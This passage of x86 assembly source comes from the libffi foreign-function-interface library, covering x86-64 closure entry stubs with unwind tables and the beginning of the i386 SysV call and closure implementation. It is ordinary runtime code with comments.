E(L(store_table), UNIX64_RET_ST_RAX_XMM0)
movq %xmm0, 8(%rsi)
jmp L(s2)
E(L(store_table), UNIX64_RET_ST_XMM0_XMM1)
movq %xmm1, 8(%rsi)
jmp L(s3)
E(L(store_table), UNIX64_RET_ST_RAX_RDX)
movq %rdx, 8(%rsi)
L(s2):
movq %rax, (%rsi)
shrl $UNIX64_SIZE_SHIFT, %ecx
rep movsb
ret
.balign 8
L(s3):
movq %xmm0, (%rsi)
shrl $UNIX64_SIZE_SHIFT, %ecx
rep movsb
ret
L(sa): call PLT(C(abort))
/* Many times we can avoid loading any SSE registers at all.
It's not worth an indirect jump to load the exact set of
SSE registers needed; zero or all is a good compromise. */
.balign 2
L(UW3):
/* cfi_restore_state */
L(load_sse):
movdqa 0x30(%r10), %xmm0
movdqa 0x40(%r10), %xmm1
movdqa 0x50(%r10), %xmm2
movdqa 0x60(%r10), %xmm3
movdqa 0x70(%r10), %xmm4
movdqa 0x80(%r10), %xmm5
movdqa 0x90(%r10), %xmm6
movdqa 0xa0(%r10), %xmm7
jmp L(ret_from_load_sse)
L(UW4):
ENDF(C(ffi_call_unix64))
/* 6 general registers, 8 vector registers,
32 bytes of rvalue, 8 bytes of alignment. */
#define ffi_closure_OFS_G 0
#define ffi_closure_OFS_V (6*8)
#define ffi_closure_OFS_RVALUE (ffi_closure_OFS_V + 8*16)
#define ffi_closure_FS (ffi_closure_OFS_RVALUE + 32 + 8)
/* The location of rvalue within the red zone after deallocating the frame. */
#define ffi_closure_RED_RVALUE (ffi_closure_OFS_RVALUE - ffi_closure_FS)
/* ffi_closure_unix64_sse
   Closure entry used when SSE argument registers may carry arguments:
   save xmm0-xmm7 into the register-save area, then join the common
   path (L(sse_entry1)) in ffi_closure_unix64.  %r10 carries the
   closure pointer (read there at FFI_TRAMPOLINE_SIZE offsets).  */
.balign 2
.globl C(ffi_closure_unix64_sse)
FFI_HIDDEN(C(ffi_closure_unix64_sse))
C(ffi_closure_unix64_sse):
L(UW5):
subq $ffi_closure_FS, %rsp
L(UW6):
/* cfi_adjust_cfa_offset(ffi_closure_FS) */
movdqa %xmm0, ffi_closure_OFS_V+0x00(%rsp)
movdqa %xmm1, ffi_closure_OFS_V+0x10(%rsp)
movdqa %xmm2, ffi_closure_OFS_V+0x20(%rsp)
movdqa %xmm3, ffi_closure_OFS_V+0x30(%rsp)
movdqa %xmm4, ffi_closure_OFS_V+0x40(%rsp)
movdqa %xmm5, ffi_closure_OFS_V+0x50(%rsp)
movdqa %xmm6, ffi_closure_OFS_V+0x60(%rsp)
movdqa %xmm7, ffi_closure_OFS_V+0x70(%rsp)
jmp L(sse_entry1)
L(UW7):
ENDF(C(ffi_closure_unix64_sse))
/* ffi_closure_unix64
   Integer-only closure entry (and common tail for the _sse variant):
   save the six GP argument registers, load cif/fun/user_data from the
   closure in %r10, call ffi_closure_unix64_inner, then pop the frame
   and dispatch on the returned type code to load the native return
   registers from the rvalue area (now in the red zone).  */
.balign 2
.globl C(ffi_closure_unix64)
FFI_HIDDEN(C(ffi_closure_unix64))
C(ffi_closure_unix64):
L(UW8):
subq $ffi_closure_FS, %rsp
L(UW9):
/* cfi_adjust_cfa_offset(ffi_closure_FS) */
L(sse_entry1):
movq %rdi, ffi_closure_OFS_G+0x00(%rsp)
movq %rsi, ffi_closure_OFS_G+0x08(%rsp)
movq %rdx, ffi_closure_OFS_G+0x10(%rsp)
movq %rcx, ffi_closure_OFS_G+0x18(%rsp)
movq %r8, ffi_closure_OFS_G+0x20(%rsp)
movq %r9, ffi_closure_OFS_G+0x28(%rsp)
#ifdef __ILP32__
movl FFI_TRAMPOLINE_SIZE(%r10), %edi /* Load cif */
movl FFI_TRAMPOLINE_SIZE+4(%r10), %esi /* Load fun */
movl FFI_TRAMPOLINE_SIZE+8(%r10), %edx /* Load user_data */
#else
movq FFI_TRAMPOLINE_SIZE(%r10), %rdi /* Load cif */
movq FFI_TRAMPOLINE_SIZE+8(%r10), %rsi /* Load fun */
movq FFI_TRAMPOLINE_SIZE+16(%r10), %rdx /* Load user_data */
#endif
/* Also reached from ffi_go_closure_unix64 with cif/fun/user_data
   already loaded.  */
L(do_closure):
leaq ffi_closure_OFS_RVALUE(%rsp), %rcx /* Load rvalue */
movq %rsp, %r8 /* Load reg_args */
leaq ffi_closure_FS+8(%rsp), %r9 /* Load argp */
call PLT(C(ffi_closure_unix64_inner))
/* Deallocate stack frame early; return value is now in redzone. */
addq $ffi_closure_FS, %rsp
L(UW10):
/* cfi_adjust_cfa_offset(-ffi_closure_FS) */
/* The first byte of the return value contains the FFI_TYPE. */
/* Each load_table entry is 8 bytes (enforced by E()); out-of-range
   codes abort at L(la).  %rsi points at the rvalue in the redzone.  */
cmpb $UNIX64_RET_LAST, %al
movzbl %al, %r10d
leaq L(load_table)(%rip), %r11
ja L(la)
leaq (%r11, %r10, 8), %r10
leaq ffi_closure_RED_RVALUE(%rsp), %rsi
jmp *%r10
.balign 8
L(load_table):
E(L(load_table), UNIX64_RET_VOID)
ret
E(L(load_table), UNIX64_RET_UINT8)
movzbl (%rsi), %eax
ret
E(L(load_table), UNIX64_RET_UINT16)
movzwl (%rsi), %eax
ret
E(L(load_table), UNIX64_RET_UINT32)
movl (%rsi), %eax
ret
E(L(load_table), UNIX64_RET_SINT8)
movsbl (%rsi), %eax
ret
E(L(load_table), UNIX64_RET_SINT16)
movswl (%rsi), %eax
ret
E(L(load_table), UNIX64_RET_SINT32)
movl (%rsi), %eax
ret
E(L(load_table), UNIX64_RET_INT64)
movq (%rsi), %rax
ret
E(L(load_table), UNIX64_RET_XMM32)
movd (%rsi), %xmm0
ret
E(L(load_table), UNIX64_RET_XMM64)
movq (%rsi), %xmm0
ret
E(L(load_table), UNIX64_RET_X87)
fldt (%rsi)
ret
/* X87_2 loads in reverse so the first value ends up in st(0).  */
E(L(load_table), UNIX64_RET_X87_2)
fldt 16(%rsi)
fldt (%rsi)
ret
/* Two-register aggregates: load the second register, then merge at
   L(l2)/L(l3) to load the first.  */
E(L(load_table), UNIX64_RET_ST_XMM0_RAX)
movq 8(%rsi), %rax
jmp L(l3)
E(L(load_table), UNIX64_RET_ST_RAX_XMM0)
movq 8(%rsi), %xmm0
jmp L(l2)
E(L(load_table), UNIX64_RET_ST_XMM0_XMM1)
movq 8(%rsi), %xmm1
jmp L(l3)
E(L(load_table), UNIX64_RET_ST_RAX_RDX)
movq 8(%rsi), %rdx
L(l2):
movq (%rsi), %rax
ret
.balign 8
L(l3):
movq (%rsi), %xmm0
ret
L(la): call PLT(C(abort))
L(UW11):
ENDF(C(ffi_closure_unix64))
/* ffi_go_closure_unix64_sse
   Go-closure variant of ffi_closure_unix64_sse: save xmm0-xmm7, then
   join the Go-closure GP path (L(sse_entry2)) in ffi_go_closure_unix64.
   The Go closure descriptor arrives in %r10.  */
.balign 2
.globl C(ffi_go_closure_unix64_sse)
FFI_HIDDEN(C(ffi_go_closure_unix64_sse))
C(ffi_go_closure_unix64_sse):
L(UW12):
subq $ffi_closure_FS, %rsp
L(UW13):
/* cfi_adjust_cfa_offset(ffi_closure_FS) */
movdqa %xmm0, ffi_closure_OFS_V+0x00(%rsp)
movdqa %xmm1, ffi_closure_OFS_V+0x10(%rsp)
movdqa %xmm2, ffi_closure_OFS_V+0x20(%rsp)
movdqa %xmm3, ffi_closure_OFS_V+0x30(%rsp)
movdqa %xmm4, ffi_closure_OFS_V+0x40(%rsp)
movdqa %xmm5, ffi_closure_OFS_V+0x50(%rsp)
movdqa %xmm6, ffi_closure_OFS_V+0x60(%rsp)
movdqa %xmm7, ffi_closure_OFS_V+0x70(%rsp)
jmp L(sse_entry2)
L(UW14):
ENDF(C(ffi_go_closure_unix64_sse))
/* ffi_go_closure_unix64
   Like ffi_closure_unix64, but cif and fun come from the Go closure
   descriptor in %r10, and the descriptor itself is the user_data;
   then it reuses the common L(do_closure) tail above.  */
.balign 2
.globl C(ffi_go_closure_unix64)
FFI_HIDDEN(C(ffi_go_closure_unix64))
C(ffi_go_closure_unix64):
L(UW15):
subq $ffi_closure_FS, %rsp
L(UW16):
/* cfi_adjust_cfa_offset(ffi_closure_FS) */
L(sse_entry2):
movq %rdi, ffi_closure_OFS_G+0x00(%rsp)
movq %rsi, ffi_closure_OFS_G+0x08(%rsp)
movq %rdx, ffi_closure_OFS_G+0x10(%rsp)
movq %rcx, ffi_closure_OFS_G+0x18(%rsp)
movq %r8, ffi_closure_OFS_G+0x20(%rsp)
movq %r9, ffi_closure_OFS_G+0x28(%rsp)
#ifdef __ILP32__
movl 4(%r10), %edi /* Load cif */
movl 8(%r10), %esi /* Load fun */
movl %r10d, %edx /* Load closure (user_data) */
#else
movq 8(%r10), %rdi /* Load cif */
movq 16(%r10), %rsi /* Load fun */
movq %r10, %rdx /* Load closure (user_data) */
#endif
jmp L(do_closure)
L(UW17):
ENDF(C(ffi_go_closure_unix64))
/* Sadly, OSX cctools-as doesn't understand .cfi directives at all. */
#ifdef __APPLE__
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms+live_support
EHFrame0:
#elif defined(HAVE_AS_X86_64_UNWIND_SECTION_TYPE)
.section .eh_frame,"a",@unwind
#else
.section .eh_frame,"a",@progbits
#endif
#ifdef HAVE_AS_X86_PCREL
# define PCREL(X) X - .
#else
# define PCREL(X) X@rel
#endif
/* Simplify advancing between labels. Assume DW_CFA_advance_loc1 fits. */
#define ADV(N, P) .byte 2, L(N)-L(P)
.balign 8
L(CIE):
.set L(set0),L(ECIE)-L(SCIE)
.long L(set0) /* CIE Length */
L(SCIE):
.long 0 /* CIE Identifier Tag */
.byte 1 /* CIE Version */
.ascii "zR\0" /* CIE Augmentation */
.byte 1 /* CIE Code Alignment Factor */
.byte 0x78 /* CIE Data Alignment Factor */
.byte 0x10 /* CIE RA Column */
.byte 1 /* Augmentation size */
.byte 0x1b /* FDE Encoding (pcrel sdata4) */
.byte 0xc, 7, 8 /* DW_CFA_def_cfa, %rsp offset 8 */
.byte 0x80+16, 1 /* DW_CFA_offset, %rip offset 1*-8 */
.balign 8
L(ECIE):
.set L(set1),L(EFDE1)-L(SFDE1)
.long L(set1) /* FDE Length */
L(SFDE1):
.long L(SFDE1)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW0)) /* Initial location */
.long L(UW4)-L(UW0) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW1, UW0)
.byte 0xc, 6, 32 /* DW_CFA_def_cfa, %rbp 32 */
.byte 0x80+6, 2 /* DW_CFA_offset, %rbp 2*-8 */
ADV(UW2, UW1)
.byte 0xa /* DW_CFA_remember_state */
.byte 0xc, 7, 8 /* DW_CFA_def_cfa, %rsp 8 */
.byte 0xc0+6 /* DW_CFA_restore, %rbp */
ADV(UW3, UW2)
.byte 0xb /* DW_CFA_restore_state */
.balign 8
L(EFDE1):
.set L(set2),L(EFDE2)-L(SFDE2)
.long L(set2) /* FDE Length */
L(SFDE2):
.long L(SFDE2)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW5)) /* Initial location */
.long L(UW7)-L(UW5) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW6, UW5)
.byte 0xe /* DW_CFA_def_cfa_offset */
.byte ffi_closure_FS + 8, 1 /* uleb128, assuming 128 <= FS < 255 */
.balign 8
L(EFDE2):
.set L(set3),L(EFDE3)-L(SFDE3)
.long L(set3) /* FDE Length */
L(SFDE3):
.long L(SFDE3)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW8)) /* Initial location */
.long L(UW11)-L(UW8) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW9, UW8)
.byte 0xe /* DW_CFA_def_cfa_offset */
.byte ffi_closure_FS + 8, 1 /* uleb128, assuming 128 <= FS < 255 */
ADV(UW10, UW9)
.byte 0xe, 8 /* DW_CFA_def_cfa_offset 8 */
L(EFDE3):
.set L(set4),L(EFDE4)-L(SFDE4)
.long L(set4) /* FDE Length */
L(SFDE4):
.long L(SFDE4)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW12)) /* Initial location */
.long L(UW14)-L(UW12) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW13, UW12)
.byte 0xe /* DW_CFA_def_cfa_offset */
.byte ffi_closure_FS + 8, 1 /* uleb128, assuming 128 <= FS < 255 */
.balign 8
L(EFDE4):
.set L(set5),L(EFDE5)-L(SFDE5)
.long L(set5) /* FDE Length */
L(SFDE5):
.long L(SFDE5)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW15)) /* Initial location */
.long L(UW17)-L(UW15) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW16, UW15)
.byte 0xe /* DW_CFA_def_cfa_offset */
.byte ffi_closure_FS + 8, 1 /* uleb128, assuming 128 <= FS < 255 */
.balign 8
L(EFDE5):
#ifdef __APPLE__
.subsections_via_symbols
.section __LD,__compact_unwind,regular,debug
/* compact unwind for ffi_call_unix64 */
.quad C(ffi_call_unix64)
.set L1,L(UW4)-L(UW0)
.long L1
.long 0x04000000 /* use dwarf unwind info */
.quad 0
.quad 0
/* compact unwind for ffi_closure_unix64_sse */
.quad C(ffi_closure_unix64_sse)
.set L2,L(UW7)-L(UW5)
.long L2
.long 0x04000000 /* use dwarf unwind info */
.quad 0
.quad 0
/* compact unwind for ffi_closure_unix64 */
.quad C(ffi_closure_unix64)
.set L3,L(UW11)-L(UW8)
.long L3
.long 0x04000000 /* use dwarf unwind info */
.quad 0
.quad 0
/* compact unwind for ffi_go_closure_unix64_sse */
.quad C(ffi_go_closure_unix64_sse)
.set L4,L(UW14)-L(UW12)
.long L4
.long 0x04000000 /* use dwarf unwind info */
.quad 0
.quad 0
/* compact unwind for ffi_go_closure_unix64 */
.quad C(ffi_go_closure_unix64)
.set L5,L(UW17)-L(UW15)
.long L5
.long 0x04000000 /* use dwarf unwind info */
.quad 0
.quad 0
#endif
#endif /* __x86_64__ */
#if defined __ELF__ && defined __linux__
.section .note.GNU-stack,"",@progbits
#endif
#endif
|
aimardcr/APKKiller
| 29,291
|
app/src/main/cpp/whale/src/libffi/x86/sysv_i386.S
|
#ifdef __i386__
/* -----------------------------------------------------------------------
sysv.S - Copyright (c) 2017 Anthony Green
- Copyright (c) 2013 The Written Word, Inc.
- Copyright (c) 1996,1998,2001-2003,2005,2008,2010 Red Hat, Inc.
X86 Foreign Function Interface
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#ifndef __x86_64__
#ifndef _MSC_VER
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#include "internal.h"
#define C2(X, Y) X ## Y
#define C1(X, Y) C2(X, Y)
#ifdef __USER_LABEL_PREFIX__
# define C(X) C1(__USER_LABEL_PREFIX__, X)
#else
# define C(X) X
#endif
#ifdef X86_DARWIN
# define L(X) C1(L, X)
#else
# define L(X) C1(.L, X)
#endif
#ifdef __ELF__
# define ENDF(X) .type X,@function; .size X, . - X
#else
# define ENDF(X)
#endif
/* Handle win32 fastcall name mangling. */
#ifdef X86_WIN32
# define ffi_call_i386 @ffi_call_i386@8
# define ffi_closure_inner @ffi_closure_inner@8
#else
# define ffi_call_i386 C(ffi_call_i386)
# define ffi_closure_inner C(ffi_closure_inner)
#endif
/* This macro allows the safe creation of jump tables without an
actual table. The entry points into the table are all 8 bytes.
The use of ORG asserts that we're at the correct location. */
/* ??? The clang assembler doesn't handle .org with symbolic expressions. */
#if defined(__clang__) || defined(__APPLE__) || (defined (__sun__) && defined(__svr4__))
# define E(BASE, X) .balign 8
#else
# define E(BASE, X) .balign 8; .org BASE + X * 8
#endif
/* ffi_call_i386 -- transfer control to a foreign function.
   On return, the X86_RET_* type code (masked from frame slot 12) selects
   an entry in store_table below, which stores the callee's raw return
   value (in %eax/%edx or the x87 top-of-stack) into the result buffer
   whose address lives at frame offset 16.  */
.text
.balign 16
.globl ffi_call_i386
FFI_HIDDEN(ffi_call_i386)
/* This is declared as
void ffi_call_i386(struct call_frame *frame, char *argp)
__attribute__((fastcall));
Thus the arguments are present in
ecx: frame
edx: argp
*/
ffi_call_i386:
L(UW0):
# cfi_startproc
#if !HAVE_FASTCALL
/* Without fastcall support, fetch both arguments from the stack.  */
movl 4(%esp), %ecx
movl 8(%esp), %edx
#endif
movl (%esp), %eax /* move the return address */
movl %ebp, (%ecx) /* store %ebp into local frame */
movl %eax, 4(%ecx) /* store retaddr into local frame */
/* New stack frame based off ebp. This is an itty bit of unwind
trickery in that the CFA *has* changed. There is no easy way
to describe it correctly on entry to the function. Fortunately,
it doesn't matter too much since at all points we can correctly
unwind back to ffi_call. Note that the location to which we
moved the return address is (the new) CFA-4, so from the
perspective of the unwind info, it hasn't moved. */
movl %ecx, %ebp
L(UW1):
# cfi_def_cfa(%ebp, 8)
# cfi_rel_offset(%ebp, 0)
movl %edx, %esp /* set outgoing argument stack */
movl 20+R_EAX*4(%ebp), %eax /* set register arguments */
movl 20+R_EDX*4(%ebp), %edx
movl 20+R_ECX*4(%ebp), %ecx
call *8(%ebp) /* call fn stored in the frame */
movl 12(%ebp), %ecx /* load return type code */
movl %ebx, 8(%ebp) /* preserve %ebx */
L(UW2):
# cfi_rel_offset(%ebx, 8)
andl $X86_RET_TYPE_MASK, %ecx
#ifdef __PIC__
/* PIC: compute the table entry address relative to L(pc1).  */
call C(__x86.get_pc_thunk.bx)
L(pc1):
leal L(store_table)-L(pc1)(%ebx, %ecx, 8), %ebx
#else
leal L(store_table)(,%ecx, 8), %ebx
#endif
movl 16(%ebp), %ecx /* load result address */
jmp *%ebx
/* Jump table: each entry is exactly 8 bytes (asserted by E()).  */
.balign 8
L(store_table):
E(L(store_table), X86_RET_FLOAT)
fstps (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_DOUBLE)
fstpl (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_LDOUBLE)
fstpt (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_SINT8)
movsbl %al, %eax
mov %eax, (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_SINT16)
movswl %ax, %eax
mov %eax, (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_UINT8)
movzbl %al, %eax
mov %eax, (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_UINT16)
movzwl %ax, %eax
mov %eax, (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_INT64)
movl %edx, 4(%ecx)
/* fallthru */
E(L(store_table), X86_RET_INT32)
movl %eax, (%ecx)
/* fallthru */
E(L(store_table), X86_RET_VOID)
L(e1):
/* Common epilogue: restore %ebx, tear down the frame, return.  */
movl 8(%ebp), %ebx
movl %ebp, %esp
popl %ebp
L(UW3):
# cfi_remember_state
# cfi_def_cfa(%esp, 4)
# cfi_restore(%ebx)
# cfi_restore(%ebp)
ret
L(UW4):
# cfi_restore_state
E(L(store_table), X86_RET_STRUCTPOP)
jmp L(e1)
E(L(store_table), X86_RET_STRUCTARG)
jmp L(e1)
E(L(store_table), X86_RET_STRUCT_1B)
movb %al, (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_STRUCT_2B)
movw %ax, (%ecx)
jmp L(e1)
/* Fill out the table so that bad values are predictable. */
E(L(store_table), X86_RET_UNUSED14)
ud2
E(L(store_table), X86_RET_UNUSED15)
ud2
L(UW5):
# cfi_endproc
ENDF(ffi_call_i386)
/* The inner helper is declared as
void ffi_closure_inner(struct closure_frame *frame, char *argp)
__attribute__((fastcall))
Thus the arguments are placed in
ecx: frame
edx: argp
*/
/* Macros to help setting up the closure_data structure. */
/* closure_FS = total stack frame size for the closure stubs;
   closure_CF = offset of closure_data within that frame (non-fastcall
   needs 8 bytes at the bottom for the two outgoing stack arguments).  */
#if HAVE_FASTCALL
# define closure_FS (40 + 4)
# define closure_CF 0
#else
# define closure_FS (8 + 40 + 12)
# define closure_CF 8
#endif
/* Spill the three incoming register arguments into closure_data.  */
#define FFI_CLOSURE_SAVE_REGS \
movl %eax, closure_CF+16+R_EAX*4(%esp); \
movl %edx, closure_CF+16+R_EDX*4(%esp); \
movl %ecx, closure_CF+16+R_ECX*4(%esp)
/* Copy cif/fun/user_data from the ffi_closure (pointed to by %eax,
   just past the trampoline) into closure_data.  */
#define FFI_CLOSURE_COPY_TRAMP_DATA \
movl FFI_TRAMPOLINE_SIZE(%eax), %edx; /* copy cif */ \
movl FFI_TRAMPOLINE_SIZE+4(%eax), %ecx; /* copy fun */ \
movl FFI_TRAMPOLINE_SIZE+8(%eax), %eax; /* copy user_data */ \
movl %edx, closure_CF+28(%esp); \
movl %ecx, closure_CF+32(%esp); \
movl %eax, closure_CF+36(%esp)
/* Load the two arguments for ffi_closure_inner: in registers when
   fastcall is available, otherwise in the two bottom stack slots.  */
#if HAVE_FASTCALL
# define FFI_CLOSURE_PREP_CALL \
movl %esp, %ecx; /* load closure_data */ \
leal closure_FS+4(%esp), %edx; /* load incoming stack */
#else
# define FFI_CLOSURE_PREP_CALL \
leal closure_CF(%esp), %ecx; /* load closure_data */ \
leal closure_FS+4(%esp), %edx; /* load incoming stack */ \
movl %ecx, (%esp); \
movl %edx, 4(%esp)
#endif
#define FFI_CLOSURE_CALL_INNER(UWN) \
call ffi_closure_inner
/* Mask the return-type code out of %eax and jump into load_table N.  */
#define FFI_CLOSURE_MASK_AND_JUMP(N, UW) \
andl $X86_RET_TYPE_MASK, %eax; \
leal L(C1(load_table,N))(, %eax, 8), %edx; \
movl closure_CF(%esp), %eax; /* optimistic load */ \
jmp *%edx
#ifdef __PIC__
# if defined X86_DARWIN || defined HAVE_HIDDEN_VISIBILITY_ATTRIBUTE
/* PIC with a local inner function: pc-relative table addressing.  */
# undef FFI_CLOSURE_MASK_AND_JUMP
# define FFI_CLOSURE_MASK_AND_JUMP(N, UW) \
andl $X86_RET_TYPE_MASK, %eax; \
call C(__x86.get_pc_thunk.dx); \
L(C1(pc,N)): \
leal L(C1(load_table,N))-L(C1(pc,N))(%edx, %eax, 8), %edx; \
movl closure_CF(%esp), %eax; /* optimistic load */ \
jmp *%edx
# else
/* PIC with a PLT call: %ebx must hold the GOT pointer across the call,
   so save/restore it around ffi_closure_inner.  */
# define FFI_CLOSURE_CALL_INNER_SAVE_EBX
# undef FFI_CLOSURE_CALL_INNER
# define FFI_CLOSURE_CALL_INNER(UWN) \
movl %ebx, 40(%esp); /* save ebx */ \
L(C1(UW,UWN)): \
/* cfi_rel_offset(%ebx, 40); */ \
call C(__x86.get_pc_thunk.bx); /* load got register */ \
addl $C(_GLOBAL_OFFSET_TABLE_), %ebx; \
call ffi_closure_inner@PLT
# undef FFI_CLOSURE_MASK_AND_JUMP
# define FFI_CLOSURE_MASK_AND_JUMP(N, UWN) \
andl $X86_RET_TYPE_MASK, %eax; \
leal L(C1(load_table,N))@GOTOFF(%ebx, %eax, 8), %edx; \
movl 40(%esp), %ebx; /* restore ebx */ \
L(C1(UW,UWN)): \
/* cfi_restore(%ebx); */ \
movl closure_CF(%esp), %eax; /* optimistic load */ \
jmp *%edx
# endif /* DARWIN || HIDDEN */
#endif /* __PIC__ */
/* Go-closure entry with the closure pointer arriving in %eax.
   Loads cif/fun from the go closure and uses the closure itself as
   user_data, then joins the common i386 closure path.  */
.balign 16
.globl C(ffi_go_closure_EAX)
FFI_HIDDEN(C(ffi_go_closure_EAX))
C(ffi_go_closure_EAX):
L(UW6):
# cfi_startproc
subl $closure_FS, %esp
L(UW7):
# cfi_def_cfa_offset(closure_FS + 4)
FFI_CLOSURE_SAVE_REGS
movl 4(%eax), %edx /* copy cif */
movl 8(%eax), %ecx /* copy fun */
movl %edx, closure_CF+28(%esp)
movl %ecx, closure_CF+32(%esp)
movl %eax, closure_CF+36(%esp) /* closure is user_data */
jmp L(do_closure_i386)
L(UW8):
# cfi_endproc
ENDF(C(ffi_go_closure_EAX))
/* Go-closure entry with the closure pointer arriving in %ecx.
   Same as the EAX variant but reads the go closure through %ecx.  */
.balign 16
.globl C(ffi_go_closure_ECX)
FFI_HIDDEN(C(ffi_go_closure_ECX))
C(ffi_go_closure_ECX):
L(UW9):
# cfi_startproc
subl $closure_FS, %esp
L(UW10):
# cfi_def_cfa_offset(closure_FS + 4)
FFI_CLOSURE_SAVE_REGS
movl 4(%ecx), %edx /* copy cif */
movl 8(%ecx), %eax /* copy fun */
movl %edx, closure_CF+28(%esp)
movl %eax, closure_CF+32(%esp)
movl %ecx, closure_CF+36(%esp) /* closure is user_data */
jmp L(do_closure_i386)
L(UW11):
# cfi_endproc
ENDF(C(ffi_go_closure_ECX))
/* The closure entry points are reached from the ffi_closure trampoline.
On entry, %eax contains the address of the ffi_closure. */
/* After ffi_closure_inner returns, the X86_RET_* code in %eax selects
   a load_table2 entry that moves the stored result from closure_data
   into the return registers (%eax/%edx or the x87 stack).  */
.balign 16
.globl C(ffi_closure_i386)
FFI_HIDDEN(C(ffi_closure_i386))
C(ffi_closure_i386):
L(UW12):
# cfi_startproc
subl $closure_FS, %esp
L(UW13):
# cfi_def_cfa_offset(closure_FS + 4)
FFI_CLOSURE_SAVE_REGS
FFI_CLOSURE_COPY_TRAMP_DATA
/* Entry point from preceding Go closures. */
L(do_closure_i386):
FFI_CLOSURE_PREP_CALL
FFI_CLOSURE_CALL_INNER(14)
FFI_CLOSURE_MASK_AND_JUMP(2, 15)
/* Jump table: each entry is exactly 8 bytes (asserted by E()).  */
.balign 8
L(load_table2):
E(L(load_table2), X86_RET_FLOAT)
flds closure_CF(%esp)
jmp L(e2)
E(L(load_table2), X86_RET_DOUBLE)
fldl closure_CF(%esp)
jmp L(e2)
E(L(load_table2), X86_RET_LDOUBLE)
fldt closure_CF(%esp)
jmp L(e2)
E(L(load_table2), X86_RET_SINT8)
movsbl %al, %eax
jmp L(e2)
E(L(load_table2), X86_RET_SINT16)
movswl %ax, %eax
jmp L(e2)
E(L(load_table2), X86_RET_UINT8)
movzbl %al, %eax
jmp L(e2)
E(L(load_table2), X86_RET_UINT16)
movzwl %ax, %eax
jmp L(e2)
E(L(load_table2), X86_RET_INT64)
movl closure_CF+4(%esp), %edx
jmp L(e2)
E(L(load_table2), X86_RET_INT32)
nop
/* fallthru */
E(L(load_table2), X86_RET_VOID)
L(e2):
addl $closure_FS, %esp
L(UW16):
# cfi_adjust_cfa_offset(-closure_FS)
ret
L(UW17):
# cfi_adjust_cfa_offset(closure_FS)
E(L(load_table2), X86_RET_STRUCTPOP)
/* Struct returned via hidden pointer: pop the 4-byte pointer arg.  */
addl $closure_FS, %esp
L(UW18):
# cfi_adjust_cfa_offset(-closure_FS)
ret $4
L(UW19):
# cfi_adjust_cfa_offset(closure_FS)
E(L(load_table2), X86_RET_STRUCTARG)
jmp L(e2)
E(L(load_table2), X86_RET_STRUCT_1B)
movzbl %al, %eax
jmp L(e2)
E(L(load_table2), X86_RET_STRUCT_2B)
movzwl %ax, %eax
jmp L(e2)
/* Fill out the table so that bad values are predictable. */
E(L(load_table2), X86_RET_UNUSED14)
ud2
E(L(load_table2), X86_RET_UNUSED15)
ud2
L(UW20):
# cfi_endproc
ENDF(C(ffi_closure_i386))
/* Go-closure entry for the STDCALL family (callee pops arguments).
   Closure pointer arrives in %ecx; joins the STDCALL closure path.  */
.balign 16
.globl C(ffi_go_closure_STDCALL)
FFI_HIDDEN(C(ffi_go_closure_STDCALL))
C(ffi_go_closure_STDCALL):
L(UW21):
# cfi_startproc
subl $closure_FS, %esp
L(UW22):
# cfi_def_cfa_offset(closure_FS + 4)
FFI_CLOSURE_SAVE_REGS
movl 4(%ecx), %edx /* copy cif */
movl 8(%ecx), %eax /* copy fun */
movl %edx, closure_CF+28(%esp)
movl %eax, closure_CF+32(%esp)
movl %ecx, closure_CF+36(%esp) /* closure is user_data */
jmp L(do_closure_STDCALL)
L(UW23):
# cfi_endproc
ENDF(C(ffi_go_closure_STDCALL))
/* For REGISTER, we have no available parameter registers, and so we
enter here having pushed the closure onto the stack. */
/* Note the frame allocation is closure_FS-4: the 4 bytes already
   pushed (the closure pointer) complete the frame.  The return address
   and closure are swapped so the frame layout matches the other stubs.  */
.balign 16
.globl C(ffi_closure_REGISTER)
FFI_HIDDEN(C(ffi_closure_REGISTER))
C(ffi_closure_REGISTER):
L(UW24):
# cfi_startproc
# cfi_def_cfa(%esp, 8)
# cfi_offset(%eip, -8)
subl $closure_FS-4, %esp
L(UW25):
# cfi_def_cfa_offset(closure_FS + 4)
FFI_CLOSURE_SAVE_REGS
movl closure_FS-4(%esp), %ecx /* load retaddr */
movl closure_FS(%esp), %eax /* load closure */
movl %ecx, closure_FS(%esp) /* move retaddr */
jmp L(do_closure_REGISTER)
L(UW26):
# cfi_endproc
ENDF(C(ffi_closure_REGISTER))
/* For STDCALL (and others), we need to pop N bytes of arguments off
the stack following the closure. The amount needing to be popped
is returned to us from ffi_closure_inner. */
/* The pop count is encoded in the high bits of the inner function's
